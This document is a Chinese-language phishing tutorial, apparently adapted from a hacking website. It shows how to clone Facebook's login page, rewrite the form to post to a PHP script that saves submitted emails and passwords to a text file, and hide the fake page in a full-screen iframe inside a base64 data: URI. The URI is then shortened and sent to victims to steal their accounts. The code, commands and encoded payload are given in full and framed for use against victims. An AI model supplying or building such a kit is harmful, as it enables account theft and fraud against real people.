本文以盜取facebook登陸帳號(hào)的釣魚為例，來(lái)示例如何釣魚攻擊的基本步驟。過(guò)程很簡(jiǎn)單，主要包括兩個(gè)步驟，制作釣魚頁(yè)面，與釣魚URI，其他網(wǎng)站的釣魚頁(yè)面也可以采取相似的方法，剛接觸釣魚的可以看看。

一、制作釣魚頁(yè)面

以盜取facebook登陸帳號(hào)的釣魚為例，一共包含三個(gè)文件，index.html,login.php,password.txt

第一步：制作index.html登陸頁(yè)面

首先，打開 https://www.facebook.com頁(yè)面，查看源碼，將源碼copy到index.html文件中。

然后，編輯index.html文件，找到

<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" 
method="post" onsubmit="return window.Event &amp;&amp; 
Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">

將action的值改為

action=login.php?"https://www.facebook.com/login.php?login_attempt=1"

(login.php是用來(lái)盜取登陸帳號(hào)密碼的）

將index.html放到web目錄下（我的放置在/Library/WebServer/Documents/facebook目錄下）

第二步：制作盜取facebook帳戶和密碼的腳本login.php

<?php
header ('Location: https://www.facebook.com ');//跳轉(zhuǎn)到真實(shí)的facebook頁(yè)面
$handle = fopen("password.txt", "a");//將假頁(yè)面中提交的POST數(shù)據(jù)寫入password.txt文件中foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");}
fwrite($handle, "===============\r\n");
fclose($handle);exit;?>

 第三步：創(chuàng)建接收POST數(shù)據(jù)的password.txt文件

dani-2:facebook leedani$ pwd /Library/WebServer/Documents/facebook
dani-2:facebook leedani$ sudo touch password.txt  
dani-2:facebook leedani$ sudo chmod a+w password.txt  

第四步：測(cè)試

登陸http://localhost/facebook/

輸入電子郵件與密碼，點(diǎn)擊登陸

查看password.txt文件

dani-2:facebook leedani$ cat password.txt  

看，email與pass字段就是facebook的登陸帳號(hào)與密碼。

二、制作釣魚URI

一般釣魚會(huì)采用iframe用釣魚頁(yè)面遮蓋原始頁(yè)面的方式來(lái)進(jìn)行釣魚，接下來(lái)的操作就是生成一個(gè)有這個(gè)功能的Data: URI，并將這個(gè)URI進(jìn)行短地址轉(zhuǎn)換

第一步：生成攻擊代碼

src就是你存放釣魚網(wǎng)頁(yè)的地址

<style> body {margin:0; overflow:hidden;}</style><iframe src="http://localhost/facebook/" height="100%" width="100%" border="no" 
frameBorder="0" scrolling="auto">iFrame Failed</iframe

第二步：將攻擊代碼轉(zhuǎn)換為data: URI

登陸http://dopiaza.org/tools/datauri/index.php，將上面代碼粘貼進(jìn)去，

對(duì)應(yīng)的data: URI

data:text/plain;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+

將上面的data: URI中的data:text/plain改成data:text/html

data:text/html;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+

訪問(wèn)修改后的Data URI，我們可以看到

點(diǎn)擊facebook圖標(biāo)，或下面的url鏈接(瀏覽facebook.com），將跳轉(zhuǎn)到我們?cè)诘谝徊街袆?chuàng)建的facebook的假登陸頁(yè)面 http://localhost/facebook/。

第三步：生成data: URI對(duì)應(yīng)的短地址

很顯然，這個(gè)URI太長(zhǎng)了，會(huì)引起懷疑，在真實(shí)環(huán)境下，我們可以先進(jìn)行短網(wǎng)址轉(zhuǎn)換，例如http://tinyurl.com/就提供這個(gè)服務(wù)

最后，引誘受害者點(diǎn)擊這個(gè)會(huì)連接到釣魚網(wǎng)頁(yè)的URI就可以盜取帳號(hào)密碼了。

參考：http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/